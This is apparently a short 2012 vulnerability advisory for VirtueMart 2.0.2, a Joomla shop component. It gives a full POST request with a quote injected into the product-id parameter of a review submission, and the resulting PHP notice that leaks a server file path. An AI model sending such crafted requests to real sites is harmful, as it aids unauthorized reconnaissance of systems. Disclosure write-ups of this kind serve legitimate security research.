[ TITLE ....... ][ VirtueMart Information Disclosure
[ DATE ........ ][ .0.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][ 2.0.2
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS component, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure bug.

[--------------------------------------------[
[ 3. Where is bug :)

---- REQUEST ----
POST /joomla/index.php/en/dk?virtuemart_product_id=1&virtuemart_category_id=1 HTTP/1.1
Host: localhost
(...)
vote=5&comment=(...Ax101)...+&counter=172&submit_review=Submit+Review
&virtuemart_product_id=11'HERE'a&option=com_virtuemart
&virtuemart_category_id=1&virtuemart_rating_review_id=0&task=review
-----------------

You will see:
---- RESPONSE ----
<span class="vote"><br />
<b>Notice</b>:  Undefined index:  in <b>/home/kuba/www/joomla/components/com_virtuemart/views/productdetails/tmpl/default_reviews.php</b> on line <b>79</b><br />
</span>
-----------------

[--------------------------------------------[
[ 4. More...

- http://joomla.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[